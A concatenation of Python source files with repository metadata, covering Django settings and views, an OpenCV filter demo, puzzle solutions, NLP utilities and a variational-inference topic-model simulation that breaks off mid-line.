'django.contrib.staticfiles', 'myapp' ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'mysite.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'mysite.wsgi.application' # Database # https://docs.djangoproject.com/en/1.11/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.11/topics/i18n/ LANGUAGE_CODE = 'ko-kr' TIME_ZONE = 'Asia/Seoul' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.11/howto/static-files/ STATIC_URL = '/static/' STATIC_ROOT = os.path.join(BASE_DIR, 'static')
[ "moter2588@gmail.com" ]
moter2588@gmail.com
1ef0e17cfa7a4bbe22301e1de4b0cc138b130ffd
22244d8b763d172b342f52c9707c61f288257b50
/2016/Day17_TwoStepsForward.py
9d88b64599974f68cb9513abfe27e5e85e173df5
[]
no_license
mimada/Advent16
c82859daf333dc240ca1514d2fafd4ad09a501f9
32f80d2d7f4c8d8b6e5748cde9968620b438590e
refs/heads/master
2021-01-12T09:44:28.770571
2018-12-08T22:23:53
2018-12-08T22:23:53
76,232,454
0
0
null
null
null
null
UTF-8
Python
false
false
702
py
# # 119804-20161201-18fba1ee # http://adventofcode.com/2016/day/17 ######### #S| | | # #-#-#-#-# # | | | # #-#-#-#-# # | | | # #-#-#-#-# # | | | ####### V# import md5 class TwoStepsForward: def __init__(self): self.count = 0 def getCount(self): return self.count def main(): print('Start TwoStepsForward') moves1 = [] c = TwoStepsForward('ihgpwlah') # DDRRRD # c = TwoStepsForward('kglvqrro') # DDUDRLRRUDRD # c = TwoStepsForward('ulqzkmiv') # DRURDRUDDLLDLUURRDULRLDUUDDDRR # c = TwoStepsForward('ioramepc') # ? c.move(moves1[0]) print 'KeyPad 1 code:', c.getCount() if __name__ == '__main__': main()
[ "mikaelm@mimada.se" ]
mikaelm@mimada.se
be2f60c5816e0fe6a20fffe0c75c2dce03f9f333
172018f686da5ba8390cb0f20a5ff5fe9cb25e28
/src/process_audio.py
d32a06381290b07523735ba0173464d45e0cadb0
[]
no_license
mcstanle/freezam
e397e92a75349a2ecc2eb2275a2dcf3670d48ae3
ea9233c50b1aa3d4d8fde45afb213c9ab271286a
refs/heads/master
2020-08-02T20:19:37.546253
2019-09-29T23:05:21
2019-09-29T23:05:21
211,495,199
0
0
null
null
null
null
UTF-8
Python
false
false
3,739
py
""" Classes and functions to provide the audio processing functionality. Broadly, the code in this file should do the following: 1. Apply a window function to an audio file. 2. Compute local periodograms from windowed signal. 3. Smooth Periodograms. 4. Compute window signature --> this is handled by signatureGenerator =============================================================================== Author: Mike Stanley Created: September 28, 2019 Last Modified: September 29, 2019 =============================================================================== TODO: 1. How do we deal with the left and right signal? 2. Understand the output of the create_windows function. 3. finish the periodogram function 4. start the signatures function 5. add additional signature methods to signatureGenerator """ class signatureGenerator: """ Compute signature for periodogram. Several signature schemes will be handled in this function corresponding to some of the options in the original pdf. 1. unsmoothed 2. smoothed ... """ def __init__(self, signature_type): self.signature_type=signature_type def unsmooth_signature(self, inp_periodogram): """ For signature_type='unsmoothed', finds the unsmoothed periodogram. Parameters: inp_periodogram (numpy array) : periodgram to be processed Returns: unsmooted periodogram """ pass def smooth_signature(self, inp_periodogram): """ For signature_type='smoothed', finds the smoothed periodogram. Parameters: inp_periodogram (numpy array) : periodgram to be processed Returns: smooted periodogram """ pass #TODO: add more signature methods def generate_signature(self, periodogram): """ Wrapper around all the above signature generating functions. Parameters: audio_ts (numpy array): periodogram for which we'll generate signature Returns: generated signature (output varies) """ ### series of elif statements pass class processAudio: """ Class to configure audio processing pipeline. This pipeline should include functions that: - produce a windowed time series - compute periodogram of windowed time series - compute signatures of windowed time series Note, this class doesn't have any read capabilities because that taks is handled by the database class. """ def __init__(self, window_type, window_size, window_shift, signature_type ): self.window_type=window_type self.window_size=window_size self.window_shift=window_shift self.signature_generator=signatureGenerator(signature_type) def create_windows(self, data, fs): """ Created a windowed time series from data. Parameters: data (numpy array) : 2 column numpy array with L and R signals fs (int) : frequency sample Returns: windowed time series (list of numpy arrays) """ pass def create_periodogram(self, single_window): """ Given a single window of a time series, computes the periodogram. Parameters: single_window (numpy array) : """ pass def create_signature(self, audio_ts): """ Produces a signature given an audio_ts. Parameters: audio_ts (numpy array) : time series for which we create a signature Returns: low dimensional signature (output varies depending upon signature type) """ pass
[ "mcstanle@andrew.cmu.edu" ]
mcstanle@andrew.cmu.edu
161381b413380795aca8c929268f18b4c212f395
b5d87f3fbe5ae84522c9391040a51145966ed226
/yelp/basic_python/client.py
a407ecbde4dc0b02fc7be7b2e20205d64bfbbe52
[]
no_license
oliverhuangchao/algorithm
f8b17743436c7d2e92b0761deafbf6af93ef922f
858885bc2b6b7070b5536695214c915106d56f8c
refs/heads/master
2021-01-10T05:54:41.181112
2015-07-09T19:55:04
2015-07-09T19:55:04
36,044,053
0
0
null
null
null
null
UTF-8
Python
false
false
128
py
import socket s = socket.socket() host = socket.gethostname() port = 12345 s.connect((host,port)) print s.recv(1024) s.close()
[ "chaoh@g.clemson.edu" ]
chaoh@g.clemson.edu
accd196693c2779748ce5a466d625f0e72b02186
08521c93d1de0be5fae50001cc9fa100d298597d
/Puzzles/Easy/HungerGames.py
77f66966b82e93bc950e134ee832fe6de3c0eee9
[ "MIT" ]
permissive
Naheuldark/Codingame
937fc91720529b3b1c4a685606af7b09659a1119
1ded71fad8386f3dda74f9b57ff1c056146206c3
refs/heads/main
2023-02-15T08:21:02.253854
2020-12-18T08:55:55
2020-12-18T08:55:55
319,281,967
0
0
null
null
null
null
UTF-8
Python
false
false
711
py
import sys import math num_tributes = int(input()) tributes = {input(): {'killer': 'Winner', 'killed': []} for _ in range(num_tributes)} turns = int(input()) for _ in range(turns): name, _, *victims = input().split() for victim in [v.replace(',', '') for v in victims]: tributes[name]['killed'].append(victim) tributes[victim]['killer'] = name for i, tribute in enumerate(sorted(tributes)): if i != 0: print() print('Name: {}'.format(tribute)) victims = tributes[tribute]['killed'] if not victims: print('Killed: None') else: print('Killed: {}'.format(', '.join(sorted(victims)))) print('Killer: {}'.format(tributes[tribute]['killer']))
[ "julien.bordas@amadeus.com" ]
julien.bordas@amadeus.com
11886647b4039cf4ea6cff973f854b580fc4b37c
188d711ae8d0bfc7858828bf264df63d629b7905
/tiltshift.py
94fa289230161925357a22b7b97a9b5dfff538ad
[]
no_license
hashed-sandbox/opencv-python-demo
0e6afa78bd2d8411edf96b7494a9f380f0fbf2ec
51fc517d68ebe246569d7bb19825f126e84978d8
refs/heads/master
2016-09-14T05:42:56.851445
2016-05-11T14:32:26
2016-05-11T14:32:26
58,552,637
0
0
null
null
null
null
UTF-8
Python
false
false
764
py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Imitate effects of tilt-shift lense. """ import numpy as np import cv2 import sys from boxfilter1 import boxfilter cap = cv2.VideoCapture(0) if not cap.isOpened(): sys.exit("No cameras available!") while True: ret, img_orig = cap.read() img_src = cv2.cvtColor(img_orig, cv2.COLOR_BGR2GRAY) img_dst = np.empty_like(img_src) height, width = img_dst.shape for y in xrange(height): size = abs(height * 0.8 - y) * 20 / height + 1 for x in xrange(width): img_dst[y][x] = boxfilter(img_src, int(size), x, y) cv2.imshow("Before", img_src) cv2.imshow("After", img_dst) if cv2.waitKey(10) & 0xFF == ord("q"): break cv2.destroyAllWindows()
[ "ryo_kato@hashedhyphen.com" ]
ryo_kato@hashedhyphen.com
a9be3e9178b571cd5feb05f663d37ae2ea0985c2
8815fe12e89f45d4b51bdc9eafdc199628801666
/strategy/test/make_abba_wl.py
dc45ad6aaf634c90a0a0fb0ab07d0f877ae3553e
[]
no_license
IamSzymeQQQ/PyScrabble
ddecf630c0c7f7bc6bfa89ff2f4326855aacb60c
ea346f64d383b03c7584573c76ede33c13dab787
refs/heads/master
2023-08-22T16:06:57.047968
2013-09-08T04:22:59
2013-09-08T04:22:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
225
py
__author__ = 'Jacky' from itertools import product with open('./wordlists/ABBA.txt', 'w') as f: for i in xrange(1, 6): for s in product('AB', repeat=i): f.write(''.join(s)) f.write('\n')
[ "xjtian94@gmail.com" ]
xjtian94@gmail.com
dca053fdcac8ab0cba305ddd4aae1369d921e7b8
0344e02d9bb5946b2fa5982680bf40e4bac5800c
/gtt/posts/admin.py
40fbc52e93014e638b845c0bdc42a4f2eb48f969
[]
no_license
AppsLab-KE/gtt-backend
5619b094e39c88a9b1fec2ac7094c0267b966db4
dce0e82f205e3b688e25a32310c707e39e1f7194
refs/heads/master
2021-07-04T04:44:38.063509
2020-11-09T15:14:54
2020-11-09T15:14:54
198,700,423
4
1
null
2020-09-29T09:48:04
2019-07-24T19:49:10
Python
UTF-8
Python
false
false
691
py
from django.contrib import admin from django.contrib.auth import get_user_model from posts.models import Category, Post, Comment, Reply, Bookmark from posts.forms import CategoryForm User = get_user_model() class CategoryAdmin(admin.ModelAdmin): form = CategoryForm list_display = ( 'category_name', 'resource_key', 'slug', ) class BookmarkAdmin(admin.ModelAdmin): list_display = ( 'bookmarked_post', 'user_that_bookmarked', ) admin.site.register(Category, CategoryAdmin) admin.site.register(Post) admin.site.register(Comment) admin.site.register(Reply) admin.site.register(Bookmark, BookmarkAdmin) admin.site.register(User)
[ "colasgikonyo@gmail.com" ]
colasgikonyo@gmail.com
64d29f78ae1643a4169e7455dbbc3beeb67c6dbd
676f6f2d02db6aeeaa1bb0b28ab49e8c73923d0e
/venv/Lib/site-packages/neuralcoref/utils.py
333ad28bbab947b38a586275274aca661ffe68f6
[ "Apache-2.0" ]
permissive
vrian/orsen
ce34f74ea3a14c95d37ffa5c694b7c66725925df
9c10148aba62868fad4b679a4b9b717829586e96
refs/heads/master
2023-01-21T21:47:06.210918
2018-06-23T04:46:26
2018-06-23T04:46:26
120,284,869
1
0
Apache-2.0
2023-01-09T09:39:16
2018-02-05T09:44:03
Python
UTF-8
Python
false
false
2,946
py
# coding: utf8 """Utils""" from __future__ import absolute_import from __future__ import unicode_literals from __future__ import print_function from concurrent.futures import ThreadPoolExecutor, as_completed import numpy as np from tqdm import tqdm DISTANCE_BINS = list(range(5)) + [5]*3 + [6]*8 + [7]*16 +[8]*32 def encode_distance(x): ''' Encode an integer or an array of integers as a (bined) one-hot numpy array ''' def _encode_distance(d): ''' Encode an integer as a (bined) one-hot numpy array ''' dist_vect = np.zeros((11,)) if d < 64: dist_vect[DISTANCE_BINS[d]] = 1 else: dist_vect[9] = 1 dist_vect[10] = min(float(d), 64.0) / 64.0 return dist_vect if isinstance(x, np.ndarray): arr_l = [_encode_distance(y)[np.newaxis, :] for y in x] out_arr = np.concatenate(arr_l) else: out_arr = _encode_distance(x) return out_arr def parallel_process(array, function, n_jobs=16, use_kwargs=False, front_num=10): """ A parallel version of the map function with a progress bar. Args: array (array-like): An array to iterate over. function (function): A python function to apply to the elements of array n_jobs (int, default=16): The number of cores to use use_kwargs (boolean, default=False): Whether to consider the elements of array as dictionaries of keyword arguments to function front_num (int, default=3): The number of iterations to run serially before kicking off the parallel job. Useful for catching bugs Returns: [function(array[0]), function(array[1]), ...] """ #We run the first few iterations serially to catch bugs if front_num > 0: front = [function(**a) if use_kwargs else function(a) for a in array[:front_num]] #If we set n_jobs to 1, just run a list comprehension. This is useful for benchmarking and debugging. if n_jobs==1: return front + [function(**a) if use_kwargs else function(a) for a in tqdm(array[front_num:])] #Assemble the workers with ThreadPoolExecutor(max_workers=n_jobs) as pool: #Pass the elements of array into function if use_kwargs: futures = [pool.submit(function, **a) for a in array[front_num:]] else: futures = [pool.submit(function, a) for a in array[front_num:]] kwargs = { 'total': len(futures), 'unit': 'it', 'unit_scale': True, 'leave': True } #Print out the progress as tasks complete for _ in tqdm(as_completed(futures), **kwargs): pass out = [] #Get the results from the futures. for future in tqdm(futures): try: out.append(future.result()) except Exception as e: out.append(e) return front + out
[ "jbryanalburo@gmail.com" ]
jbryanalburo@gmail.com
89d92b5b38f130dfa99c546233c90801a058f3b5
ffc77ca014668e2a4233e1df2eb73717f30135ea
/vocab/urls.py
5e856aab0a038f46cf907f6da4ded200367223b2
[]
no_license
horatius83/Vocab-Site
4ad629af4cf5b107438ea2a099bdfbf71945d08a
34716dc2a7dfa8c5c7d3241d54884523dfe896d4
refs/heads/master
2016-09-05T09:48:17.676833
2016-02-28T03:49:57
2016-02-28T03:49:57
42,882,206
0
0
null
null
null
null
UTF-8
Python
false
false
171
py
from django.conf.urls import url from . import views urlpatterns = [ url(r'^$', views.index, name='index'), url(r'^quiz', views.quiz, name='quiz') ]
[ "horatius83@gmail.com" ]
horatius83@gmail.com
f30d4cfb7f19261ff36930b150a85ca1839c3d13
bd17d6bd054b2b8750a5e39781aec342b8d3144e
/app/migrations/0003_location.py
c7a87d24bba42de3406930c8388f8e5b9961a094
[ "MIT" ]
permissive
TobiasRosskopf/django_backend_template
b9c9154932acef7d7cbfb6c6e4186605b5ffb6ae
1de5ea6b9006b0cc3898873b26ea251313cfe61d
refs/heads/master
2023-03-14T03:02:25.200889
2021-03-05T19:29:40
2021-03-05T19:29:40
302,465,508
0
0
null
null
null
null
UTF-8
Python
false
false
810
py
# Generated by Django 3.1.6 on 2021-02-11 08:20 import django.contrib.gis.db.models.fields from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0002_auto_20201008_2120'), ] operations = [ migrations.CreateModel( name='Location', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=50)), ('geom', django.contrib.gis.db.models.fields.PointField(srid=4326)), ], options={ 'verbose_name': 'Standort', 'verbose_name_plural': 'Standorte', 'ordering': ['name'], }, ), ]
[ "tobirosskopf@gmail.com" ]
tobirosskopf@gmail.com
f029f3b8ad02d37ea4d6024f24333d119d6577e8
4aaf72fe9b36568ed3f33e9eef6e8f8471cd034b
/products/views.py
5a7ce9399ef1ddd9769970e8216eb512014e5ec5
[]
no_license
henryd24/backend-django
6d0c4f4ef8be37d9d6f817e3a76c7340dc578189
6e5c98aa2b3c9dfc5fb7bdfd55c02435152ea57a
refs/heads/main
2023-07-11T00:41:52.151602
2021-08-19T20:30:32
2021-08-19T20:30:32
398,066,562
1
0
null
null
null
null
UTF-8
Python
false
false
1,852
py
from .producer import publishmqtt from rest_framework import viewsets, status from rest_framework.response import Response from rest_framework.views import APIView from .models import Product, User from .serializers import ProductSerializer import random,json class ProductViewSet(viewsets.ViewSet): def list(self, request): #/api/products products = Product.objects.all() serializer = ProductSerializer(products, many=True) return Response(serializer.data) def create(self, request): # /api/products serializer = ProductSerializer(data = request.data) serializer.is_valid(raise_exception=True) serializer.save() publishmqtt('product_created', json.dumps(serializer.data)) return Response(serializer.data, status=status.HTTP_201_CREATED) def retrieve(self, request, pk=None): #/api/products/<str:id> product = Product.objects.get(id=pk) serializer = ProductSerializer(product) return Response(serializer.data) def update(self, request, pk=None): #/api/products/<str:id> product = Product.objects.get(id=pk) serializer = ProductSerializer(instance=product, data = request.data) serializer.is_valid(raise_exception=True) serializer.save() publishmqtt('product_updated', json.dumps(serializer.data)) return Response(serializer.data, status=status.HTTP_202_ACCEPTED) def destroy(self, request, pk=None): #/api/products/<str:id> product = Product.objects.get(id=pk) product.delete() publishmqtt('product_deleted', pk) return Response(status=status.HTTP_204_NO_CONTENT) class UserAPIView(APIView): def get(self, _): users = User.objects.all() user = random.choice(users) return Response({ 'id': user.id })
[ "noreply@github.com" ]
henryd24.noreply@github.com
523cd653c2997df934cb9224042b5f56a7846918
b5af81118108e15845cbcdec046c30f168b831f3
/simulation_code.py
3f0040b7ed239eb6158417dcd31106ab724d7d4f
[]
no_license
bGhorbani/Variational-Inference-Instability
a1fba4a82af52bc592bc89cb7a2c7fb4a10c7be4
5776499ff794fe608b2a13c130aeecddbb4ba2d1
refs/heads/master
2020-03-08T22:19:23.471638
2018-05-01T20:59:34
2018-05-01T20:59:34
128,427,764
3
1
null
null
null
null
UTF-8
Python
false
false
28,639
py
# This file includes the code for generating an instance of # the topic modeling problem (Simulation Class), variational # inference algorithm (Variational_Simulation Class), the AMP # (AMP_Simulation Class), and the damped AMP algorithm # (Damped_AMP_Simulation). # Last edited by Behrooz Ghorbani on April 1st 2018. import numpy as np import math import itertools import sys import scipy.linalg as SCL class Simulation(object): """This class simulates an instance of the problem from the model X = \sqrt(beta) / d * W * H^T + Z where Z ~ N(0, 1 / d), rows of W ~ Dir(alpha) and H ~ N(0, 1). W is n-by-k and H is d-by-k. Main Attributes: _beta : signal strength _n : number of variables _d : number of observations _alpha : the Dirichlet parameter (k-dimensional) _tol : convergence tolerence _max_iter : maximum number of allowed estimation iterations _min_iter : minimum number of allowed estimation iterations _W : population class weights _H : population class profile _W_hat : estimated class weights _H_hat = estimated class profile """ def __init__(self, n, d, beta, alpha, iteration_tol, integration_tol): """Instantiates the simulation by setting the fundamental parameters of the problem.""" self._beta = beta self._n = int(n) self._d = int(d) self._alpha = np.array(alpha) self._delta = n / (d + 0.0) # The default parameters if (iteration_tol is None): self._tol = 0.005 self._max_iters = 250 self._min_iters = 50 else: self._tol = iteration_tol[0] self._max_iters = iteration_tol[1] self._min_iters = iteration_tol[2] self._integ_tol = integration_tol k = len(alpha) self._k = int(k) # integration variables self._grid = None self._grid_inner_prods = None self._prior_density = None self._construct_grid() M = self._grid.shape[0] self._tilt_cache = np.ones((M, 1)) # Generating the Problems self._W = np.random.dirichlet(alpha, size = self._n) self._H = np.random.normal(0, 1, size = (self._d, k)) self._Z = np.random.normal(0, (1.0 / math.sqrt(d)), size = (self._n, self._d)) self._X = (math.sqrt(beta + 0.0) / d) * np.dot(self._W, self._H.T) + self._Z self._flag = False # estimates self._W_hat = np.ones((self._n, self._k)) / (k + 0.0) self._H_hat = np.random.normal(size = (self._d, self._k)) # initial start points self._W_0 = np.copy(self._W_hat) self._H_0 = np.copy(self._H_hat) # The attributes below record the statistics of the final estimate: self._deltaW_norms = np.zeros((k, 2)) self._deltaH_norms = np.zeros((k, 2)) self._iterations_taken = None # Convergence Errors self._err = np.zeros((self._max_iters, 1)) # Distance from uninformative fixed-point self._dist = np.zeros((self._max_iters, 2)) # Average Norm: self._H_ave_norm = 0 self._W_ave_norm = 0 # inner product of the column difference self._Wdiff_in = 0 self._Wdiff_corr = 0 self._Hdiff_corr = 0 self._Hdiff_in = 0 # norm of the difference self._Wdiff_norm = 0 self._Hdiff_norm = 0 # Calculation for Binder Cumulant self._delta_H_inner = 0 self._delta_W_inner = 0 self._delta_H_norm = 0 self._delta_W_norm = 0 self._binder_epsilon = 0.0001 # Indicator of the convergence of the instance self._converged = False def _construct_grid(self): """This function constructs a uniform grid over the simplex for computing numerical integrals.""" tol = self._integ_tol N = int(1.0 / tol) - 1 k = int(self._k) temp = np.zeros((N**(k - 1), k)) indices = [0] * k one_dim_grid = np.linspace(tol, 1.0, num = int(N), endpoint = False) index = 0 for i in range(N ** (k - 1)): tau = [] zeta = int(i) for j in range(k - 1): indices[j] = zeta % N zeta = zeta / N tau.append(one_dim_grid[indices[j]]) if np.sum(tau) < 1: tau.append(1 - np.sum(tau)) temp[index, :] = np.array(tau) index += 1 self._grid = temp[:index, :] # To speed up our computation, we precompute some # recurring quantities here nu = self._alpha[0] - 1 M = self._grid.shape[0] self._prior_density = np.prod(self._grid ** nu, axis = 1, keepdims=True) self._grid_inner_prods = {} for i in range(k): for j in range(k): t1 = self._grid[:, i].reshape(M, 1) t2 = self._grid[:, j].reshape(M, 1) self._grid_inner_prods[(i, j)] = t1 * t2 def _set_cache(self, A): """ This function precomputes and caches some recurring computation in the integration process.""" Zeta = np.dot(self._grid, A.T) Zeta2 = self._grid * Zeta t1b = np.sum(Zeta2, axis = 1) / 2.0 M = self._grid.shape[0] self._tilt_cache = t1b.reshape(M, 1) def _fs(self, A, b, cache = False): ''' This function computes the first and second moments of the posterior distribution. In addition, the log(normalizing factor) of the distribution is also computed. ''' b = b.reshape(len(b), 1) k = int(self._k) tol = self._integ_tol N = int(1.0 / tol) M = self._grid.shape[0] # Computing the tilt to the density: t1a = np.dot(self._grid, b) # if the part of the tilt due to A is cached if cache: t1b = self._tilt_cache else: Zeta = np.dot(self._grid, A.T) Zeta2 = self._grid * Zeta t1b = np.sum(Zeta2, axis = 1) / 2.0 t1b = t1b.reshape(M, 1) t1 = t1a - t1b # computing the prior density norm_const = np.max(t1) - 1.0 t2 = self._prior_density density = np.exp(t1 - norm_const) * t2 # normalization factor q = np.sum(density) / (N ** (k - 1) + 0.0) if q <= 0: raise Exception('Probability density has no mass') # first moment s = np.dot(density.T, self._grid).T / (N ** (k - 1) + 0.0) s = s / np.sum(s) * q # second moment omega = np.zeros((k, k)) for i in range(k): for j in range(i, k): omega[i, j] = np.dot(density.T, self._grid_inner_prods[(i, j)]) / (N ** (k - 1) + 0.0) omega[j, i] = omega[i, j] # Scaling factor, first moment, second moment return (np.log(q) + norm_const, s / q, omega / q) def iteration(self): """ This function does one iteration of estimation according to (Variational / AMP) method. This is an abstract method and should be implemented in the lower level classes.""" pass @staticmethod def _min_permutation_error(X, Y): """ For two n-by-m matrices with m<<n, this function computes the minimum ell_infinity norm of the difference of the two matrices over all permutations of the columns.""" n = X.shape[0] m = X.shape[1] if not ((Y.shape[0] == n) and (Y.shape[1] == m)): raise Exception("The Dimensions are inconsistent") permutations = list(itertools.permutations(range(m))) N = len(permutations) value = float("inf") for perm in permutations: X_temp = X[:, perm] Z = X_temp - Y temp = np.max(np.abs(Z)) value = np.min([value, temp]) return(value) def estimate(self, verbose = False, memory_efficient = True): """ This function runs an iterative estimation procedure for estimating W_hat and H_hat. The function stops when the ell_infinity norm between two consequitive estimates is small or the number of iterations has surpassed self._max_iters.""" self._iterations_taken = 0 convergence_criteria = float("inf") while ((self._iterations_taken < self._min_iters) or ((convergence_criteria > self._tol) and (self._iterations_taken < self._max_iters))): W_hat = np.copy(self._W_hat) H_hat = np.copy(self._H_hat) # Do one iteration of the estimator self.iteration() self._err[self._iterations_taken] = Simulation._min_permutation_error(W_hat, self._W_hat); self._dist[self._iterations_taken, 0] = np.linalg.norm(self._W_hat - self._W_0) self._dist[self._iterations_taken, 1] = np.linalg.norm(self._H_hat - self._H_0) convergence_criteria = self._err[self._iterations_taken] self._iterations_taken += 1 if verbose: print(convergence_criteria) if verbose: print(self._iterations_taken) self._converged = (self._iterations_taken < self._max_iters) if np.isnan(convergence_criteria): raise Exception('Convergence Criteria is NAN') def release_memory(self): """This function deletes all of the high-dimensional matrices so that the object can be saved in a memory efficient manner.""" del self._H del self._W del self._W_hat del self._H_hat del self._X del self._Z del self._W_0 del self._H_0 del self._grid del self._prior_density del self._tilt_cache del self._grid_inner_prods def compute_accuracy(self, verbose = False, Eigenvector_analysis = False): """ This function computes accuracy statistics of the instance. Afterwards, memory consuming attributes of the object are deleted. """ if not self._flag: k = len(self._alpha) # delta_W inner product and norms zeta = np.mean(self._W, axis = 1).reshape((self._n, 1)) zeta = np.dot(zeta, np.ones((1, k))) temp_W = self._W - zeta zeta = np.mean(self._W_hat, axis = 1).reshape((self._n, 1)) self._W_ave_norm = np.linalg.norm(zeta) zeta = np.dot(zeta, np.ones((1, k))) temp_W2 = self._W_hat - zeta + self._binder_epsilon * np.random.normal(size = (self._n, k)) self._Wdiff_corr = np.corrcoef(temp_W.T, temp_W2.T) self._Wdiff_in = np.dot(temp_W.T, temp_W2) for i in range(k): self._deltaW_norms[i, 0] = np.linalg.norm(temp_W[:, i]) self._deltaW_norms[i, 1] = np.linalg.norm(temp_W2[:, i]) self._Wdiff_norm = np.linalg.norm(temp_W2) / np.sqrt(self._n + 0.0) # delta_H inner product and norms zeta = np.mean(self._H, axis = 1).reshape((self._d, 1)) zeta = np.dot(zeta, np.ones((1, k))) temp_H = self._H - zeta zeta = np.mean(self._H_hat, axis = 1).reshape((self._d, 1)) self._H_ave_norm = np.linalg.norm(zeta) zeta = np.dot(zeta, np.ones((1, k))) temp_H2 = self._H_hat - zeta + self._binder_epsilon * np.random.normal(size = (self._d, k)) self._Hdiff_corr = np.corrcoef(temp_H.T, temp_H2.T) self._Hdiff_in = np.dot(temp_H.T, temp_H2) / (self._d + 0.0) for i in range(k): self._deltaH_norms[i, 0] = np.linalg.norm(temp_H[:, i]) self._deltaH_norms[i, 1] = np.linalg.norm(temp_H2[:, i]) self._Hdiff_norm = np.linalg.norm(temp_H2) / np.sqrt(self._d + 0.0) # Calculations Necessary for Binder Cumulant: if k == 2: temp_W2 = self._W_hat[:, 1] - self._W_hat[:, 0] self._delta_W_norm = np.linalg.norm(temp_W2) temp_W2 = temp_W2.reshape((self._n, 1)) + self._binder_epsilon * np.random.normal(size = (self._n, 1)) temp_W = self._W[:,1] - self._W[:, 0] Wdiff_in = np.dot(temp_W.T, temp_W2) self._delta_W_inner = Wdiff_in / (np.linalg.norm(temp_W) * np.linalg.norm(temp_W2)) temp_H2 = self._H_hat[:,1] - self._H_hat[:, 0] self._delta_H_norm = np.linalg.norm(temp_H2) temp_H2 = temp_H2.reshape((self._d, 1)) + self._binder_epsilon * np.random.normal(size = (self._d, 1)) temp_H = self._H[:,1] - self._H[:, 0] Hdiff_in = np.dot(temp_H.T, temp_H2) self._delta_H_inner = Hdiff_in / (np.linalg.norm(temp_H) * np.linalg.norm(temp_H2)) self._flag = True self.release_memory() class Variational_Simulation(Simulation): """This class is a sub-class of Simulation and specializes it for variational inference method. """ def __init__(self, n, d, beta, alpha, iteration_tol, integration_tol, eps): """Instantiates the simulation by setting the fundamental parameters of the problem.""" super(Variational_Simulation, self).__init__(n, d, beta, alpha, iteration_tol, integration_tol) self._tq2 = 0 self._tq1 = 0 self._q1 = 0 self._q2 = 0 self._compute_initial_conds(eps) k = len(alpha) # Extra parameters associated with the Variational Estimator self._Q = (self._q1 * np.identity(k) + self._q2 * np.ones((k, k))) self._tQ = np.identity(k) self._tG = np.zeros((k, k)) self._m = np.dot(self._X.T, self._W_hat) * np.sqrt(beta) self._tm = np.dot(self._X, self._H_hat) * np.sqrt(beta) self._kl = np.zeros((self._max_iters, 1)) self._energy1 = 0 def _compute_initial_conds(self, eps): """ This function computes the uninformative fixed point of the model when there is no signal. This fixed-point is perturbed and then used for initialization of the iterative algorithm. """ k = self._k + 0.0 k0 = int(self._k) n = self._n + 0.0 d = self._d + 0.0 self._W_hat = np.ones((self._n, self._k)) / (k + 0.0) self._W_0 = np.copy(self._W_hat) # computing the H_0 tol_h_0 = 0.005 difference = 1000 q1 = 1 tq1 = 1 while (difference > tol_h_0): tq1_hat = self._beta / (1.0 + q1) lgq, mu, omega = self._fs(tq1_hat * np.eye(k0), np.zeros(k0)) q1_hat = self._beta * self._delta / (k - 1.0) * (k * omega[0, 0] - 1.0 / k) difference = np.abs(q1 - q1_hat) + np.abs(tq1 - tq1_hat) q1 = q1_hat tq1 = tq1_hat q2 = (self._delta * self._beta - k * q1) / (k ** 2 + 0.0) m_star = np.dot(self._X.T, self._W_0) self._tq2 = self._beta * ((np.linalg.norm(m_star) ** 2) / (k * d * (1 + q1 + k * q2) ** 2) \ - (q2) / ((1 + q1) * (1 + q1 + k * q2))) self._q2 = q2 self._q1 = q1 self._tq1 = tq1 h_star = m_star * np.sqrt(self._beta) / (1.0 + q1 + k * q2) self._H_hat = h_star self._H_0 = np.copy(self._H_hat) # Adding Perturbations: temp = np.random.dirichlet(self._alpha, size = self._n) temp = temp * np.linalg.norm(self._W_hat) / np.linalg.norm(temp) self._W_hat = (1 - eps) * self._W_hat + eps * temp temp = np.random.normal(0, 1, size = (self._d, self._k)) temp = temp * np.linalg.norm(self._H_hat) / np.linalg.norm(temp) self._H_hat = (1 - eps) * self._H_hat + eps * temp def release_memory(self): super(Variational_Simulation, self).release_memory() del self._m del self._tm del self._tG def _compute_kl(self): """ This function computes the KL-divergence of the variational posterior and the true posterior. To save computation, constants are left out of the calculation. """ beta = self._beta + 0.0 n = self._n + 0.0 d = self._d + 0.0 k = len(self._alpha) covariance = np.identity(k) + self._Q covariance = np.linalg.inv(covariance) F = np.sqrt(beta) * self._H_hat tF = np.sqrt(beta) * self._W_hat sG = np.dot(F.T, F) + d * beta * covariance stG = self._tG fit = np.dot(tF, F.T) term1 = - 1.0 / np.sqrt(beta) * np.trace(np.dot(self._X.T, fit)) term1 += 1.0 / (2 * d * beta) * np.trace(np.dot(sG, stG)) term2 = 0 term2 = 1.0 / np.sqrt(beta) * np.trace(np.dot(self._tm, tF.T)) term2 += -1.0 / (2 * beta) * np.trace(np.dot(self._tQ, stG)) term2 += 1.0 / np.sqrt(beta) * 